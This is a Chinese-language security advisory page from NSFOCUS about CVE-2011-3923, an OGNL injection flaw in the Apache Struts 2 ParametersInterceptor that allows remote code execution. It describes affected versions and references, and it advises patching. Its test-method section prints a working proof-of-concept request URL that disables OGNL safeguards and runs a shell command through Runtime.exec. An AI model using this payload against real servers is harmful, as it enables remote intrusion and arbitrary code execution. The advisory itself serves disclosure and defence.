安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Apache Struts 'ParameterInterceptor' 类OGNL安全绕过漏洞 (CVE-2011-3923)
发布日期:
2012-01-22
更新日期:
2012-01-22
受影响系统:
Apache Group Struts 2.x
不受影响系统:
Apache Group Struts 2.3.1.2
描述:
BUGTRAQ ID:
51628
CVE(CAN) ID:
CVE-2011-3923
Apache Struts是一款开发Java web应用程序的开源Web应用框架。
Apache Struts 2.0.0 - 2.3.1.1内存在远程命令执行漏洞,ParametersInterceptor允许使用括号,这样在处理不匹配的属性数据类型时,ParametersInterceptor又可将参数值解释为OGNL表达式,远程攻击者可通过特制的参数利用此漏洞执行任意代码。
<*来源:Meder Kydyraliev (
bugtraq@web.areopag.net
)
链接:
http://packetstormsecurity.com/files/120908/struts_code_exec_parameters.rb.txt
http://packetstormsecurity.com/files/osvdb/OSVDB-78501
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/myaction?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]=
new
java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true),
@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWND'))(meh)&amp;z[(foo)('meh')]=true
建议:
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://httpd.apache.org/
浏览次数:
3549
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客